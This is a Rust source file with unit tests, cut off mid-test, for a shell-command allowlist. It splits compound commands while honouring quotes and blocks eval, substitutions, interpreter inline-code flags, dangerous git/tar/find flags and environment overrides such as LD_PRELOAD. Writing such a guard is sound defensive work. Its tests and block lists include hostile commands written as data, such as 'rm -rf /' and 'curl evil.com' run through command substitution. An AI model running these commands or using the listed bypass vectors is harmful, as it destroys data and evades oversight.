lean_ctx/core/
shell_allowlist.rs

//! Shell allowlist with quote-aware, segment-based command parsing.
//!
//! Security model (Information Bottleneck principle):
//! - When the allowlist is set: ALL segments of a compound command must be allowed (deny-by-default).
//! - When it is empty: commands pass unless they hit the unconditional blocklist
//!   (backwards-compatible blocklist-only mode).
//! - Dangerous patterns (`eval`-style commands, `$()` or backticks at command position)
//!   are blocked in both modes.
7
8/// Checks if a command is allowed by the shell allowlist.
9/// Returns `Ok(())` if allowed, `Err(message)` if blocked.
10///
11/// When the allowlist is empty, all commands pass (blocklist-only mode).
12/// When non-empty, EVERY command segment in the pipeline must match.
13pub fn check_shell_allowlist(command: &str) -> Result<(), String> {
14    let normalized = normalize_line_continuations(command);
15    let cmd = normalized.as_str();
16
17    if has_dangerous_patterns(cmd) {
18        return Err(format!(
19            "[BLOCKED — DO NOT RETRY] Command uses eval or $()/ backticks at command position, \
20             which is blocked regardless of allowlist. \
21             This is a permanent security restriction, not a transient error.\n\
22             Command: {command}"
23        ));
24    }
25
26    check_substitution_in_args(cmd);
27    check_pipe_to_bare_interpreter(cmd);
28
29    let allowlist = effective_allowlist();
30    if allowlist.is_empty() {
31        check_unconditional_blocked_only(cmd)?;
32        return Ok(());
33    }
34    check_all_segments(cmd, &allowlist)
35}
36
/// Prepares a raw command string for scanning.
///
/// Backslash-newline pairs (both `\` + CRLF and `\` + LF) are deleted so a command
/// split across lines is seen as one line, and the Unicode line/paragraph
/// separators U+2028 and U+2029 are turned into `\n`.
fn normalize_line_continuations(command: &str) -> String {
    // CRLF continuations first, so the LF pass does not leave a stray `\r` behind.
    let without_crlf_continuations = command.replace("\\\r\n", "");
    let joined = without_crlf_continuations.replace("\\\n", "");
    joined.replace(|c: char| matches!(c, '\u{2028}' | '\u{2029}'), "\n")
}
45
46/// WARN-FIRST: Log warning (or block if strict) for $(), backticks, <() in arguments.
47fn check_substitution_in_args(command: &str) {
48    let strict = crate::core::config::Config::load().shell_strict_mode;
49    if has_unquoted_substitution_in_args(command) {
50        if strict {
51            tracing::warn!(
52                "[SECURITY] Command substitution in arguments blocked (shell_strict_mode=true): {command}"
53            );
54        } else {
55            tracing::warn!(
56                "[SECURITY] Command substitution in arguments detected (warn-only, set shell_strict_mode=true to block): {command}"
57            );
58        }
59    }
60}
61
/// Check for `$(`, backticks, `<(` and `>(` outside of command position and
/// outside quotes.
///
/// The scan works on bytes. Everything before the first unquoted space or tab is
/// treated as the command word and ignored; everything after it counts as
/// arguments. Content inside single or double quotes is skipped.
///
/// Backslash escapes are honoured the way a POSIX shell reads them: outside
/// quotes and inside double quotes a backslash protects the next byte, so
/// `"a\\"` closes its quote and `\"` does not open one. Inside single quotes a
/// backslash is literal.
fn has_unquoted_substitution_in_args(command: &str) -> bool {
    let bytes = command.as_bytes();
    let len = bytes.len();
    let mut i = 0;
    let mut in_single_quote = false;
    let mut in_double_quote = false;
    // Set at the first unquoted space/tab; from then on we are scanning arguments.
    let mut in_args = false;

    while i < len {
        let ch = bytes[i];

        if in_single_quote {
            in_single_quote = ch != b'\'';
            i += 1;
            continue;
        }

        if in_double_quote {
            match ch {
                // Skip the escaped byte so `\\` followed by `"` still closes the quote.
                b'\\' => i = (i + 2).min(len),
                b'"' => {
                    in_double_quote = false;
                    i += 1;
                }
                _ => i += 1,
            }
            continue;
        }

        match ch {
            // An escaped byte is literal: it can neither open a quote nor start a substitution.
            b'\\' => i = (i + 2).min(len),
            b'\'' => {
                in_single_quote = true;
                i += 1;
            }
            b'"' => {
                in_double_quote = true;
                i += 1;
            }
            b' ' | b'\t' => {
                in_args = true;
                i += 1;
            }
            // Still inside the command word: command position is checked elsewhere.
            _ if !in_args => i += 1,
            b'`' => return true,
            b'$' | b'<' | b'>' if bytes.get(i + 1) == Some(&b'(') => return true,
            _ => i += 1,
        }
    }
    false
}
121
122/// WARN-FIRST: Log warning for piping into bare interpreter (no script file).
123fn check_pipe_to_bare_interpreter(command: &str) {
124    let segments = split_on_operators(command);
125    let pipe_indices: Vec<usize> = {
126        let mut indices = Vec::new();
127        let bytes = command.as_bytes();
128        let len = bytes.len();
129        let mut j = 0;
130        let mut in_sq = false;
131        let mut in_dq = false;
132        while j < len {
133            if in_sq {
134                if bytes[j] == b'\'' {
135                    in_sq = false;
136                }
137                j += 1;
138                continue;
139            }
140            if in_dq {
141                if bytes[j] == b'"' && (j == 0 || bytes[j - 1] != b'\\') {
142                    in_dq = false;
143                }
144                j += 1;
145                continue;
146            }
147            match bytes[j] {
148                b'\'' => {
149                    in_sq = true;
150                    j += 1;
151                }
152                b'"' => {
153                    in_dq = true;
154                    j += 1;
155                }
156                b'|' if j + 1 < len && bytes[j + 1] != b'|' => {
157                    indices.push(j);
158                    j += 1;
159                }
160                _ => {
161                    j += 1;
162                }
163            }
164        }
165        indices
166    };
167    let _ = pipe_indices;
168
169    for (idx, seg) in segments.iter().enumerate() {
170        if idx == 0 {
171            continue;
172        }
173        if is_bare_interpreter_stdin(seg) {
174            let base = extract_base_from_segment(seg);
175            let strict = crate::core::config::Config::load().shell_strict_mode;
176            if strict {
177                tracing::warn!(
178                    "[SECURITY] Pipe to bare interpreter '{base}' blocked (shell_strict_mode=true)"
179                );
180            } else {
181                tracing::warn!("[SECURITY] Pipe to bare interpreter '{base}' detected (warn-only)");
182            }
183        }
184    }
185}
186
187/// For empty allowlists: still enforce UNCONDITIONAL_BLOCKED commands.
188fn check_unconditional_blocked_only(command: &str) -> Result<(), String> {
189    let segments = extract_all_commands(command);
190    for seg in &segments {
191        let base = extract_base_from_segment(seg);
192        if !base.is_empty() && UNCONDITIONAL_BLOCKED.contains(&base.as_str()) {
193            return Err(format!(
194                "[BLOCKED — DO NOT RETRY] '{base}' is unconditionally blocked \
195                 regardless of allowlist configuration.\n\
196                 Command: {command}"
197            ));
198        }
199        check_inline_env_block(seg)?;
200        check_interpreter_eval_only(seg)?;
201        check_dangerous_flags(seg)?;
202    }
203    Ok(())
204}
205
/// Splits one shell command segment into words, honouring quotes and backslashes.
///
/// Outer quotes are removed from the returned tokens. Outside single quotes a
/// backslash is dropped and the following character is taken literally;
/// inside single quotes every character is literal. Unquoted whitespace
/// separates tokens, and empty tokens are never emitted.
/// E.g. `git -C "Program Files" status` → `["git", "-C", "Program Files", "status"]`
pub fn shell_tokenize(input: &str) -> Vec<String> {
    /// Which kind of quoted region the scanner is currently inside.
    #[derive(Clone, Copy)]
    enum Quote {
        None,
        Single,
        Double,
    }

    let mut words = Vec::new();
    let mut word = String::new();
    let mut quote = Quote::None;
    let mut iter = input.chars();

    while let Some(ch) = iter.next() {
        match (ch, quote) {
            ('\'', Quote::None) => quote = Quote::Single,
            ('\'', Quote::Single) => quote = Quote::None,
            ('"', Quote::None) => quote = Quote::Double,
            ('"', Quote::Double) => quote = Quote::None,
            ('\\', Quote::None | Quote::Double) => {
                // A trailing backslash with nothing after it is silently dropped.
                if let Some(escaped) = iter.next() {
                    word.push(escaped);
                }
            }
            (_, Quote::None) if ch.is_whitespace() => {
                if !word.is_empty() {
                    words.push(std::mem::take(&mut word));
                }
            }
            _ => word.push(ch),
        }
    }

    if !word.is_empty() {
        words.push(word);
    }
    words
}
238
/// Returns the byte offset at which the first shell token of `input` ends.
///
/// The token ends at the first ASCII whitespace byte that is neither inside
/// single/double quotes nor escaped by a backslash; if there is none, the full
/// length of `input` is returned. `skip_env_assignments` uses this to step over
/// assignments with quoted values such as `FOO="bar baz"`.
fn quote_aware_token_end(input: &str) -> usize {
    let bytes = input.as_bytes();
    let mut pos = 0;
    let mut single = false;
    let mut double = false;

    while let Some(&byte) = bytes.get(pos) {
        if byte == b'\'' && !double {
            single = !single;
        } else if byte == b'"' && !single {
            double = !double;
        } else if byte == b'\\' && !single {
            // Step over the escaped byte as well (one extra on top of the shared step).
            pos += 1;
        } else if byte.is_ascii_whitespace() && !single && !double {
            return pos;
        }
        pos += 1;
    }
    bytes.len()
}
269
270/// Like `check_interpreter_abuse` but only checks for eval flags on interpreters.
271/// Skips delegation-command checks (which require an allowlist for membership test).
272/// Used in blocklist-only mode where there is no allowlist.
273fn check_interpreter_eval_only(segment: &str) -> Result<(), String> {
274    let trimmed = skip_env_assignments(segment.trim());
275    let tokens = shell_tokenize(trimmed);
276    if tokens.is_empty() {
277        return Ok(());
278    }
279    let base = tokens[0]
280        .rsplit('/')
281        .next()
282        .unwrap_or(&tokens[0])
283        .to_string();
284    if !INTERPRETER_COMMANDS.contains(&base.as_str()) {
285        return Ok(());
286    }
287    for tok in &tokens[1..] {
288        if EVAL_FLAGS.contains(&tok.as_str()) {
289            return Err(format!(
290                "[BLOCKED — DO NOT RETRY] Interpreter '{base}' with inline code execution \
291                 flag '{tok}' is blocked. Use a script file instead.\n\
292                 This is a permanent security restriction."
293            ));
294        }
295        if has_eval_flag_prefix(tok) {
296            return Err(format!(
297                "[BLOCKED — DO NOT RETRY] Interpreter '{base}' with combined flag '{tok}' \
298                 containing eval flag is blocked.\n\
299                 This is a permanent security restriction."
300            ));
301        }
302    }
303    if tokens[1..].iter().any(|t| t.contains("<<")) {
304        return Err(format!(
305            "[BLOCKED — DO NOT RETRY] Interpreter '{base}' with heredoc stdin is blocked. \
306             Use a script file instead.\n\
307             This is a permanent security restriction."
308        ));
309    }
310    Ok(())
311}
312
/// Base commands rejected in every mode, whether or not they are allowlisted.
/// They evaluate arbitrary code or re-enter the shell.
const UNCONDITIONAL_BLOCKED: &[&str] = &[
    "eval", "exec", "source", ".",
];

/// Base commands treated as interpreters; their arguments are screened for
/// inline-code flags such as `-c`/`-e`.
const INTERPRETER_COMMANDS: &[&str] = &[
    // scripting languages
    "python", "python3", "python2", "node", "ruby", "perl", "lua", "php",
    // shells
    "bash", "sh", "zsh", "fish", "dash", "ksh",
];

/// Exact interpreter arguments that are treated as "run this inline code".
const EVAL_FLAGS: &[&str] = &[
    "-c", "-e", "-r", "-p",
    "--eval", "--exec", "-exec", "--print", "--run",
];

/// File-name suffixes that mark an interpreter argument as a script file
/// (as opposed to the interpreter reading its program from stdin).
const SCRIPT_EXTENSIONS: &[&str] = &[
    ".py", ".rb", ".js", ".ts", ".pl", ".lua", ".php",
    ".sh", ".bash", ".zsh",
    ".mjs", ".cjs", ".tsx", ".jsx",
];

/// Commands that run another command given in their arguments; that delegated
/// command must be allowlisted as well.
const DELEGATION_COMMANDS: &[&str] = &[
    "env", "nice", "timeout", "sudo", "doas",
];
336
337/// Check if a segment uses an interpreter with an eval flag, or a delegation command
338/// whose target is not in the allowlist.
339fn check_interpreter_abuse(segment: &str, allowlist: &[String]) -> Result<(), String> {
340    check_interpreter_abuse_inner(segment, allowlist, 0)
341}
342
343fn check_interpreter_abuse_inner(
344    segment: &str,
345    allowlist: &[String],
346    depth: usize,
347) -> Result<(), String> {
348    if depth > 3 {
349        return Ok(());
350    }
351    let trimmed = skip_env_assignments(segment.trim());
352    let tokens = shell_tokenize(trimmed);
353    if tokens.is_empty() {
354        return Ok(());
355    }
356
357    let base = tokens[0]
358        .rsplit('/')
359        .next()
360        .unwrap_or(&tokens[0])
361        .to_string();
362
363    if INTERPRETER_COMMANDS.contains(&base.as_str()) {
364        for tok in &tokens[1..] {
365            if EVAL_FLAGS.contains(&tok.as_str()) {
366                return Err(format!(
367                    "[BLOCKED — DO NOT RETRY] Interpreter '{base}' with inline code execution \
368                     flag '{tok}' is blocked. Use a script file instead.\n\
369                     This is a permanent security restriction."
370                ));
371            }
372            if has_eval_flag_prefix(tok) {
373                return Err(format!(
374                    "[BLOCKED — DO NOT RETRY] Interpreter '{base}' with combined flag '{tok}' \
375                     containing eval flag is blocked.\n\
376                     This is a permanent security restriction."
377                ));
378            }
379        }
380        if tokens[1..].iter().any(|t| t.contains("<<")) {
381            return Err(format!(
382                "[BLOCKED — DO NOT RETRY] Interpreter '{base}' with heredoc stdin is blocked. \
383                 Use a script file instead.\n\
384                 This is a permanent security restriction."
385            ));
386        }
387    }
388
389    if DELEGATION_COMMANDS.contains(&base.as_str()) {
390        let rest_tokens: Vec<&str> = tokens[1..]
391            .iter()
392            .map(std::string::String::as_str)
393            .skip_while(|t| t.starts_with('-') || t.contains('='))
394            .collect();
395        if let Some(&delegated_tok) = rest_tokens.first() {
396            let delegated = delegated_tok.rsplit('/').next().unwrap_or(delegated_tok);
397            if !delegated.is_empty() && !allowlist.iter().any(|a| a == delegated) {
398                return Err(format!(
399                    "[BLOCKED — DO NOT RETRY] '{base}' delegates to '{delegated}' which is not \
400                     in the shell allowlist. This is a permanent restriction."
401                ));
402            }
403            let rest_str = rest_tokens.join(" ");
404            check_interpreter_abuse_inner(&rest_str, allowlist, depth + 1)?;
405        }
406    }
407
408    Ok(())
409}
410
/// Reports whether `token` is a combined short-flag cluster (such as `-pe`,
/// `-ne`, `-ce`) containing one of the eval letters `c`, `e`, `r` or `p`.
///
/// Only tokens that start with a single `-` and are at least three bytes long
/// qualify; long options (`--…`) and plain two-character flags return `false`.
/// Despite the name, the eval letter may appear anywhere after the dash.
fn has_eval_flag_prefix(token: &str) -> bool {
    match token.strip_prefix('-') {
        Some(cluster) if token.len() >= 3 && !cluster.starts_with('-') => cluster
            .chars()
            .any(|flag| matches!(flag, 'c' | 'e' | 'r' | 'p')),
        _ => false,
    }
}
420
421/// Check if a segment is a bare interpreter after a pipe (no script file argument).
422fn is_bare_interpreter_stdin(segment: &str) -> bool {
423    let trimmed = skip_env_assignments(segment.trim());
424    let tokens = shell_tokenize(trimmed);
425    if tokens.is_empty() {
426        return false;
427    }
428    let base = tokens[0]
429        .rsplit('/')
430        .next()
431        .unwrap_or(&tokens[0])
432        .to_string();
433    if !INTERPRETER_COMMANDS.contains(&base.as_str()) {
434        return false;
435    }
436    !tokens[1..]
437        .iter()
438        .any(|t| !t.starts_with('-') && SCRIPT_EXTENSIONS.iter().any(|ext| t.ends_with(ext)))
439}
440
/// `git` argument prefixes that are rejected by `check_dangerous_flags`.
const DANGEROUS_GIT_FLAGS: &[&str] = &[
    // remote helper program overrides
    "--upload-pack",
    "--receive-pack",
    // config overrides
    "--config=core.sshcommand",
    "--config=core.gitproxy",
];

/// `tar` argument prefixes that are rejected by `check_dangerous_flags`.
const DANGEROUS_TAR_FLAGS: &[&str] = &[
    "--to-command",
    "--use-compress-program",
];

/// Inline `NAME=` environment assignments that are rejected because they can
/// hijack which program gets executed.
const BLOCKED_INLINE_ENV: &[&str] = &[
    // executable lookup
    "PATH=",
    // git / ssh helper programs
    "GIT_ASKPASS=",
    "GIT_SSH=",
    "GIT_SSH_COMMAND=",
    "GIT_EDITOR=",
    "GIT_EXTERNAL_DIFF=",
    "SSH_ASKPASS=",
    // dynamic loader injection
    "LD_PRELOAD=",
    "DYLD_INSERT_LIBRARIES=",
];
463
464fn check_dangerous_flags(segment: &str) -> Result<(), String> {
465    let trimmed = skip_env_assignments(segment.trim());
466    let tokens = shell_tokenize(trimmed);
467    if tokens.is_empty() {
468        return Ok(());
469    }
470    let base = tokens[0]
471        .rsplit('/')
472        .next()
473        .unwrap_or(&tokens[0])
474        .to_string();
475
476    match base.as_str() {
477        "git" => {
478            for tok in &tokens[1..] {
479                for flag in DANGEROUS_GIT_FLAGS {
480                    if tok.starts_with(flag) {
481                        return Err(format!(
482                            "[BLOCKED — DO NOT RETRY] 'git' with dangerous flag '{tok}' is blocked.\n\
483                             This is a permanent security restriction."
484                        ));
485                    }
486                }
487            }
488        }
489        "tar" => {
490            for tok in &tokens[1..] {
491                for flag in DANGEROUS_TAR_FLAGS {
492                    if tok.starts_with(flag) {
493                        return Err(format!(
494                            "[BLOCKED — DO NOT RETRY] 'tar' with dangerous flag '{tok}' is blocked.\n\
495                             This is a permanent security restriction."
496                        ));
497                    }
498                }
499            }
500        }
501        "find" => {
502            for tok in &tokens[1..] {
503                if tok == "-exec" || tok == "-execdir" {
504                    return Err(format!(
505                        "[BLOCKED — DO NOT RETRY] 'find' with '{tok}' is blocked. \
506                         Use 'find ... -print' and pipe to xargs instead.\n\
507                         This is a permanent security restriction."
508                    ));
509                }
510            }
511        }
512        "awk" | "gawk" | "mawk" => {
513            for tok in &tokens[1..] {
514                if tok.contains("system(") {
515                    return Err(format!(
516                        "[BLOCKED — DO NOT RETRY] '{base}' with 'system()' call is blocked.\n\
517                         This is a permanent security restriction."
518                    ));
519                }
520            }
521        }
522        _ => {}
523    }
524    Ok(())
525}
526
527fn check_inline_env_block(segment: &str) -> Result<(), String> {
528    let trimmed = segment.trim();
529    for blocked in BLOCKED_INLINE_ENV {
530        if trimmed.starts_with(blocked) {
531            return Err(format!(
532                "[BLOCKED — DO NOT RETRY] Inline environment override '{blocked}' is blocked.\n\
533                 This is a permanent security restriction."
534            ));
535        }
536    }
537    Ok(())
538}
539
540fn check_all_segments(command: &str, allowlist: &[String]) -> Result<(), String> {
541    if allowlist.is_empty() {
542        return Ok(());
543    }
544
545    if has_dangerous_patterns(command) {
546        return Err(format!(
547            "[BLOCKED — DO NOT RETRY] Command uses eval or $()/ backticks at command position, \
548             which is blocked in restricted mode. \
549             This is a permanent security restriction, not a transient error.\n\
550             Command: {command}"
551        ));
552    }
553
554    let segments = extract_all_commands(command);
555    if segments.is_empty() {
556        return Err("[BLOCKED — DO NOT RETRY] Empty command".to_string());
557    }
558
559    for seg in &segments {
560        check_inline_env_block(seg)?;
561        let base = extract_base_from_segment(seg);
562        if base.is_empty() {
563            continue;
564        }
565        if UNCONDITIONAL_BLOCKED.contains(&base.as_str()) {
566            return Err(format!(
567                "[BLOCKED — DO NOT RETRY] '{base}' is unconditionally blocked \
568                 regardless of allowlist membership. \
569                 This is a permanent security restriction.\n\
570                 Command: {command}"
571            ));
572        }
573        check_interpreter_abuse(seg, allowlist)?;
574        check_dangerous_flags(seg)?;
575        if !allowlist.iter().any(|a| a == &base) {
576            return Err(format!(
577                "[BLOCKED — DO NOT RETRY] '{base}' is not in the shell allowlist. \
578                 This is a permanent restriction, not a transient error.\n\
579                 Fix: add '{base}' to shell_allowlist in ~/.lean-ctx/config.toml\n\
580                 Or disable the allowlist: shell_allowlist = []\n\
581                 Do NOT retry this command — it will fail again with the same error."
582            ));
583        }
584    }
585    Ok(())
586}
587
588/// Detect dangerous shell patterns that bypass allowlist intent.
589///
590/// Only blocks patterns that are genuinely dangerous at command position.
591/// `$()` and backticks in *arguments* are allowed — the base command is
592/// already validated by the allowlist, and blocking substitutions in
593/// arguments breaks legitimate workflows (e.g. `git commit -m "$(cat ...)"`,
594/// pre-commit hooks, playwright scripts).
595fn has_dangerous_patterns(command: &str) -> bool {
596    let trimmed = command.trim();
597
598    for blocked in UNCONDITIONAL_BLOCKED {
599        let with_space = format!("{blocked} ");
600        if trimmed.starts_with(&with_space) {
601            return true;
602        }
603        for sep in ["; ", "&& ", "|| ", "| ", "\n"] {
604            if trimmed.contains(&format!("{sep}{blocked} ")) {
605                return true;
606            }
607        }
608    }
609
610    if has_substitution_at_command_pos(trimmed) {
611        return true;
612    }
613
614    false
615}
616
617/// Check if `$()` or backticks appear at command position (first token
618/// of any segment). Substitutions in *arguments* are intentionally
619/// allowed — the security boundary is the base-command allowlist check.
620fn has_substitution_at_command_pos(command: &str) -> bool {
621    let segments = split_on_operators(command);
622    for seg in segments {
623        let trimmed = seg.trim();
624        let cmd_start = skip_env_assignments(trimmed);
625
626        if cmd_start.starts_with("$(") {
627            return true;
628        }
629
630        let tokens = shell_tokenize(cmd_start);
631        let first_token = tokens.first().map_or("", std::string::String::as_str);
632        if first_token.starts_with('`') || first_token == "`" {
633            return true;
634        }
635    }
636    false
637}
638
639/// Extract ALL command segments from a compound shell command.
640/// Splits on: &&, ||, ;, | (pipe), and handles subshell grouping.
641fn extract_all_commands(command: &str) -> Vec<String> {
642    split_on_operators(command)
643        .into_iter()
644        .map(|s| s.trim().to_string())
645        .filter(|s| !s.is_empty())
646        .collect()
647}
648
/// Split command string on shell operators: `;`, `&&`, `||`, `|`, `&`, and on
/// `\n` / `\r`.
///
/// Operators are only recognised outside single quotes, outside double quotes
/// and at parenthesis depth zero. Backslash escapes follow POSIX shell rules:
/// outside quotes and inside double quotes a backslash protects the next byte,
/// inside single quotes it is literal. Without this, inputs such as
/// `echo "a\\"; rm -rf /` or `echo \"; rm -rf /` were scanned as if the quote
/// never closed, and everything after the separator was hidden inside the first
/// segment.
///
/// The returned slices are untrimmed and may be empty; a trailing empty piece
/// after a final operator is not returned.
fn split_on_operators(command: &str) -> Vec<&str> {
    let bytes = command.as_bytes();
    let len = bytes.len();
    let mut segments = Vec::new();
    let mut start = 0;
    let mut i = 0;
    let mut in_single_quote = false;
    let mut in_double_quote = false;
    let mut paren_depth: u32 = 0;

    while i < len {
        let ch = bytes[i];

        if in_single_quote {
            in_single_quote = ch != b'\'';
            i += 1;
            continue;
        }

        if in_double_quote {
            match ch {
                // Skip the escaped byte so `\\` followed by `"` still closes the quote.
                b'\\' => i = (i + 2).min(len),
                b'"' => {
                    in_double_quote = false;
                    i += 1;
                }
                _ => i += 1,
            }
            continue;
        }

        match ch {
            // An escaped byte is literal: it is neither a quote nor an operator.
            b'\\' => i = (i + 2).min(len),
            b'\'' => {
                in_single_quote = true;
                i += 1;
            }
            b'"' => {
                in_double_quote = true;
                i += 1;
            }
            b'(' => {
                paren_depth += 1;
                i += 1;
            }
            b')' => {
                paren_depth = paren_depth.saturating_sub(1);
                i += 1;
            }
            b'\n' | b'\r' | b';' if paren_depth == 0 => {
                segments.push(&command[start..i]);
                i += 1;
                start = i;
            }
            // `&&` / `||` are two bytes wide; a single `&` (background) or `|`
            // (pipe) is one. All four separate commands.
            b'&' | b'|' if paren_depth == 0 => {
                let width = if bytes.get(i + 1) == Some(&ch) { 2 } else { 1 };
                segments.push(&command[start..i]);
                i += width;
                start = i;
            }
            _ => i += 1,
        }
    }

    if start < len {
        segments.push(&command[start..]);
    }

    segments
}
740
741/// Extract the base command name from a single segment (no operators).
742fn extract_base_from_segment(segment: &str) -> String {
743    let trimmed = segment.trim();
744    if trimmed.is_empty() {
745        return String::new();
746    }
747
748    let cmd_part = skip_env_assignments(trimmed);
749    if cmd_part.is_empty() {
750        return String::new();
751    }
752
753    let tokens = shell_tokenize(cmd_part);
754    let first_token = tokens.first().map_or("", std::string::String::as_str);
755
756    first_token
757        .rsplit('/')
758        .next()
759        .unwrap_or(first_token)
760        .to_string()
761}
762
763/// Skip leading KEY=VALUE environment variable assignments.
764/// Uses quote-aware scanning so `FOO="bar baz" git status` correctly
765/// skips the entire `FOO="bar baz"` token.
766fn skip_env_assignments(segment: &str) -> &str {
767    let mut rest = segment;
768    loop {
769        let rest_trimmed = rest.trim_start();
770        if rest_trimmed.is_empty() {
771            return rest_trimmed;
772        }
773        let end = quote_aware_token_end(rest_trimmed);
774        if end == 0 {
775            return rest_trimmed;
776        }
777        let raw_token = &rest_trimmed[..end];
778        let unquoted: String = raw_token
779            .chars()
780            .filter(|c| *c != '"' && *c != '\'')
781            .collect();
782        if unquoted.contains('=')
783            && !unquoted.starts_with('-')
784            && !unquoted.starts_with('/')
785            && !unquoted.starts_with('.')
786        {
787            rest = &rest_trimmed[end..];
788        } else {
789            return rest_trimmed;
790        }
791    }
792}
793
794fn effective_allowlist() -> Vec<String> {
795    // LEAN_CTX_SHELL_ALLOWLIST_OVERRIDE completely replaces the config (for testing)
796    if let Ok(ov) = std::env::var("LEAN_CTX_SHELL_ALLOWLIST_OVERRIDE") {
797        return ov
798            .split(',')
799            .map(|s| s.trim().to_string())
800            .filter(|s| !s.is_empty())
801            .collect();
802    }
803    let mut list = crate::core::config::Config::load().shell_allowlist;
804    if let Ok(env_val) = std::env::var("LEAN_CTX_SHELL_ALLOWLIST") {
805        for entry in env_val
806            .split(',')
807            .map(|s| s.trim().to_string())
808            .filter(|s| !s.is_empty())
809        {
810            if !list.contains(&entry) {
811                list.push(entry);
812            }
813        }
814    }
815    list
816}
817
818/// Public accessor for extracting all command segments.
819pub fn extract_all_commands_pub(command: &str) -> Vec<String> {
820    extract_all_commands(command)
821}
822
823// Legacy compat: single-segment extraction (used by other callers)
824pub fn extract_base_command(command: &str) -> String {
825    let first_seg = split_on_operators(command)
826        .into_iter()
827        .next()
828        .unwrap_or(command);
829    extract_base_from_segment(first_seg)
830}
831
832#[cfg(test)]
833mod tests {
834    use super::*;
835
836    // --- extract_base_command tests (legacy compat) ---
837
838    #[test]
839    fn extract_simple_command() {
840        assert_eq!(extract_base_command("git status"), "git");
841    }
842
843    #[test]
844    fn extract_with_path() {
845        assert_eq!(extract_base_command("/usr/bin/git log"), "git");
846    }
847
848    #[test]
849    fn extract_with_env_assignment() {
850        assert_eq!(extract_base_command("LANG=en_US git log"), "git");
851    }
852
853    #[test]
854    fn extract_chained_commands() {
855        assert_eq!(extract_base_command("cd /tmp && ls -la"), "cd");
856    }
857
858    #[test]
859    fn extract_piped_command() {
860        assert_eq!(extract_base_command("grep foo | wc -l"), "grep");
861    }
862
863    #[test]
864    fn extract_semicolon_chain() {
865        assert_eq!(extract_base_command("echo hello; rm -rf /"), "echo");
866    }
867
868    #[test]
869    fn extract_empty_command() {
870        assert_eq!(extract_base_command(""), "");
871    }
872
873    #[test]
874    fn extract_whitespace_only() {
875        assert_eq!(extract_base_command("   "), "");
876    }
877
878    #[test]
879    fn extract_multiple_env_vars() {
880        assert_eq!(extract_base_command("FOO=bar BAZ=qux cargo test"), "cargo");
881    }
882
883    // --- All-segments validation tests ---
884
885    fn allow(cmds: &[&str]) -> Vec<String> {
886        cmds.iter().map(std::string::ToString::to_string).collect()
887    }
888
889    #[test]
890    fn allowlist_empty_always_passes() {
891        assert!(check_all_segments("anything", &[]).is_ok());
892    }
893
894    #[test]
895    fn allowlist_blocks_unlisted() {
896        let list = allow(&["git", "cargo"]);
897        let result = check_all_segments("npm install", &list);
898        assert!(result.is_err());
899        assert!(result.unwrap_err().contains("npm"));
900    }
901
902    #[test]
903    fn allowlist_allows_listed() {
904        let list = allow(&["git", "cargo", "npm"]);
905        assert!(check_all_segments("git status", &list).is_ok());
906        assert!(check_all_segments("cargo test --release", &list).is_ok());
907        assert!(check_all_segments("npm run build", &list).is_ok());
908    }
909
910    #[test]
911    fn allowlist_allows_full_path() {
912        let list = allow(&["git"]);
913        assert!(check_all_segments("/usr/bin/git status", &list).is_ok());
914    }
915
916    #[test]
917    fn allowlist_allows_with_env_prefix() {
918        let list = allow(&["git"]);
919        assert!(check_all_segments("LANG=C git log", &list).is_ok());
920    }
921
922    #[test]
923    fn allowlist_blocks_similar_names() {
924        let list = allow(&["git"]);
925        assert!(check_all_segments("gitk --all", &list).is_err());
926    }
927
928    // --- Multi-segment validation (the critical security improvement) ---
929
930    #[test]
931    fn all_segments_must_be_allowed_chain() {
932        let list = allow(&["git", "cargo"]);
933        // Both allowed → ok
934        assert!(check_all_segments("git status && cargo test", &list).is_ok());
935        // Second not allowed → block
936        assert!(check_all_segments("git status && rm -rf /", &list).is_err());
937    }
938
939    #[test]
940    fn all_segments_must_be_allowed_pipe() {
941        let list = allow(&["git", "grep", "wc"]);
942        assert!(check_all_segments("git log | grep fix | wc -l", &list).is_ok());
943        // cat not allowed
944        assert!(check_all_segments("git log | cat", &list).is_err());
945    }
946
947    #[test]
948    fn all_segments_must_be_allowed_semicolon() {
949        let list = allow(&["echo", "ls"]);
950        assert!(check_all_segments("echo hello; ls -la", &list).is_ok());
951        assert!(check_all_segments("echo hello; rm -rf /", &list).is_err());
952    }
953
954    #[test]
955    fn all_segments_must_be_allowed_or() {
956        let list = allow(&["git", "echo"]);
957        assert!(check_all_segments("git pull || echo failed", &list).is_ok());
958        assert!(check_all_segments("git pull || curl evil.com", &list).is_err());
959    }
960
961    // --- Dangerous pattern detection ---
962
963    #[test]
964    fn blocks_eval() {
965        let list = allow(&["echo", "eval"]);
966        assert!(check_all_segments("eval 'rm -rf /'", &list).is_err());
967    }
968
969    #[test]
970    fn blocks_command_substitution_at_command_pos() {
971        let list = allow(&["echo"]);
972        assert!(check_all_segments("$(curl evil.com)", &list).is_err());
973    }
974
975    #[test]
976    fn blocks_backtick_at_command_pos() {
977        let list = allow(&["echo"]);
978        assert!(check_all_segments("`curl evil.com`", &list).is_err());
979    }
980
981    // --- $() in arguments is ALLOWED (base command validated by allowlist) ---
982
983    #[test]
984    fn allows_dollar_paren_in_arguments() {
985        let list = allow(&["echo", "git", "cat"]);
986        assert!(check_all_segments("echo $(whoami)", &list).is_ok());
987        assert!(check_all_segments("echo hello", &list).is_ok());
988    }
989
990    #[test]
991    fn allows_git_commit_with_cat_heredoc() {
992        let list = allow(&["git", "cat"]);
993        assert!(check_all_segments(
994            "git commit -m \"$(cat <<'EOF'\nfix: something\nEOF\n)\"",
995            &list,
996        )
997        .is_ok());
998    }
999
1000    #[test]
1001    fn allows_backticks_in_arguments() {
1002        let list = allow(&["echo"]);
1003        assert!(check_all_segments("echo `date`", &list).is_ok());
1004    }
1005
1006    // --- Error message contains DO NOT RETRY ---
1007
1008    #[test]
1009    fn error_message_contains_do_not_retry() {
1010        let list = allow(&["git"]);
1011        let err = check_all_segments("npm install", &list).unwrap_err();
1012        assert!(
1013            err.contains("DO NOT RETRY"),
1014            "Error should contain 'DO NOT RETRY': {err}"
1015        );
1016        assert!(
1017            err.contains("config.toml"),
1018            "Error should mention config: {err}"
1019        );
1020    }
1021
1022    #[test]
1023    fn error_message_for_dangerous_patterns_contains_do_not_retry() {
1024        let list = allow(&["echo"]);
1025        let err = check_all_segments("eval 'bad'", &list).unwrap_err();
1026        assert!(
1027            err.contains("DO NOT RETRY"),
1028            "Error should contain 'DO NOT RETRY': {err}"
1029        );
1030    }
1031
1032    // --- Issue #294: pre-commit and playwright should work ---
1033
1034    #[test]
1035    fn pre_commit_in_default_allowlist() {
